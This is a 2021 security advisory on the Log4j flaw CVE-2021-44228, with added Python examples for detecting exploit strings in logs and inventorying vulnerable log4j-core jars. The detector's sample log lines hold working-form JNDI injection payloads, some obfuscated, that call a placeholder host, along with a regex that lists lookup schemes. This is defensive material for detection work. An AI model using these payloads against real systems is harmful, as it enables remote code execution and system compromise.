On December 9, 2021 at 2:25 am, an exploit affecting Apache Log4j version 2 was published by “@P0rZ9” on Twitter, along with proof-of-concept (PoC) code on GitHub. Since this initial publication, CVE-2021-44228 has been assigned to the vulnerability in Log4j version 2.
This vulnerability is triggered when Apache Log4j logs untrusted input containing a crafted string, which causes Log4j to fetch and execute attacker-supplied code. It is not a problem with the Apache web server software; Log4j is a separate logging library and is not part of the Apache web server. Any string that ends up being logged via Log4j could potentially be used to exploit this vulnerability.
To date, these strings have predominantly contained URLs that cause Log4j to fetch content from an attacker-hosted server; the vulnerable Log4j library retrieves that content and executes it on the system running Log4j. Successful exploitation gives the attacker control of the system on which the exploit ran, resulting in complete compromise of that system. It is also likely that threat actors will use such a compromised system to move laterally.
Reporting to date has shown that this vulnerability is already being scanned and exploited in the wild. Victims have seen a combination of security researchers scanning for the vulnerability and threat actors using it to conduct resource hijacking, such as installing Coin Miners and installing Cobalt Strike on systems.
It is essential to understand that Apache Log4j could be present both in software developed by your organization and in software provided by many vendors. If you cannot directly patch or mitigate this vulnerability, you should actively detect exploitation attempts.
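Because the exploit string has to pass through a log statement, the most direct way to detect attempts is to scan logs for the lookup pattern that triggers the remote fetch. The following detector is an added example (it is not Ankura's code and not part of the original advisory). It assumes the well-documented `${jndi:...}` lookup form of CVE-2021-44228 and shows why a naive substring match is not enough: Log4j resolves nested `${lower:...}`, `${upper:...}` and `${x:-y}` lookups before the outer lookup is evaluated, so the detector collapses them first. The sample log lines and the `.example` host names are constructed for the example.

```python
import re

# Constructed sample log lines (not from the advisory): one benign request and
# three carrying the kind of lookup string the advisory describes. Hosts use
# the reserved .example TLD as placeholders.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://lookup-host.example/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://lookup-host.example}"',
]

# Inner lookups that Log4j resolves before it evaluates the outer ${jndi:...};
# a detector has to collapse them or a plain substring check never sees "jndi".
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${unknown:-value} -> value

# Lookup schemes that make Log4j contact a remote host; captures scheme and host.
_JNDI = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)", re.IGNORECASE
)


def normalize(text):
    """Repeatedly resolve nested lower/upper/default lookups, innermost first,
    until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan(lines):
    """Return (line_no, scheme, host) for every line carrying a remote JNDI lookup."""
    hits = []
    for no, line in enumerate(lines, start=1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((no, m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for no, scheme, host in scan(SAMPLE_LOGS):
        print(f"line {no}: {scheme} lookup to {host}")
```

Run it over web-server access logs, reverse-proxy logs and any application log that records request headers (User-Agent, X-Forwarded-For and similar are the fields most often seen carrying the string). The host captured by the detector is the indicator to pivot on in outbound LDAP/RMI/DNS traffic from the same time window.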
What software is impacted?
- Systems running Apache Log4j version 2.0-beta through version 2.14.1 are vulnerable to this exploit.
Apache Log4j may be used in many Apache-based systems that are exposed to the internet, and these systems are used widely by various cloud providers and vendors. To date, the systems that are likely impacted include: Struts 2, Solr, Druid, Flink, and Swift.
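Because Log4j is bundled inside vendor applications as well as in-house builds, the practical first step is an inventory: find every copy of log4j-core on a host, including copies nested inside WAR/EAR archives or renamed/shaded jars, and compare the version against the 2.0-beta through 2.14.1 range above. The scanner below is an added example (not Ankura's code and not part of the original advisory). It assumes the standard log4j-core package layout (`org/apache/logging/log4j/core/`), reads the version from the jar file name or its manifest, and also reports whether the `JndiLookup` class is present, since an in-range jar from which that class has been removed has usually already been hardened. The sample jar and war are constructed in memory so the example runs offline; the helper and function names are the example's own.

```python
import io
import re
import zipfile
from pathlib import Path

# Range named in the advisory: 2.0-beta through 2.14.1, inclusive.
VULN_LOW, VULN_HIGH = (2, 0, 0), (2, 14, 1)
# Package prefix identifying log4j-core classes, and the class carrying the
# JNDI lookup code path.
CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

_VER = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta\d*)?")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None when unparseable."""
    m = _VER.fullmatch(text.strip())
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None


def in_vulnerable_range(version):
    return VULN_LOW <= version <= VULN_HIGH


def _manifest_version(zf):
    """Fallback for renamed or shaded jars: read the version from the manifest."""
    if "META-INF/MANIFEST.MF" not in zf.namelist():
        return None
    for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
        if line.startswith(("Implementation-Version:", "Log4jReleaseVersion:")):
            return parse_version(line.split(":", 1)[1])
    return None


def assess_jar(jar_bytes, path=""):
    """Return one finding per log4j-core copy in the archive, recursing into
    nested jar/war/ear entries so bundled copies are not missed."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(jar_bytes))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if any(n.startswith(CORE_PREFIX) for n in names):
            m = re.search(r"log4j-core-([^/]+)\.jar$", path)
            version = parse_version(m[1]) if m else None
            if version is None:
                version = _manifest_version(zf)
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": JNDI_CLASS in names,
                "vulnerable_range": version is not None and in_vulnerable_range(version),
            })
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(assess_jar(zf.read(inner), f"{path}!/{inner}"))
    return findings


def scan_directory(root):
    """Walk a filesystem tree and assess every jar/war/ear found in it."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(assess_jar(p.read_bytes(), str(p)))
    return findings


def make_sample_jar(version, with_jndi_class=True):
    """Constructed stand-in for a log4j-core jar (manifest plus empty class
    entries); exists only so this example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(CORE_PREFIX + "Logger.class", b"")
        if with_jndi_class:
            zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()


def make_sample_war(inner_jar_bytes, inner_name):
    """Constructed application archive bundling a jar under WEB-INF/lib."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/" + inner_name, inner_jar_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    war = make_sample_war(make_sample_jar("2.14.1"), "log4j-core-2.14.1.jar")
    for finding in assess_jar(war, "app.war"):
        print(finding)
```

Point `scan_directory()` at application install roots and container image layers; a finding with `vulnerable_range` true and `jndi_lookup_present` true is a copy that still needs patching or mitigation, and a finding with no parsable version still deserves manual review because the class path alone proves a log4j-core copy is present.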
What is the outlook for this vulnerability?
Given that threat actors have already been observed scanning for this vulnerability and exploiting it in the wild, more threat actors will likely start to leverage this exploit. While there have been no reports yet of ransomware threat actors leveraging this vulnerability, they will likely use it to gain initial access to victims in the coming days and weeks.
A guide that Ankura's Cybersecurity & Data Privacy team has put together to identify potential vulnerabilities and compromises, and to take the necessary remediation steps, is available for download below.
© Copyright 2021. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.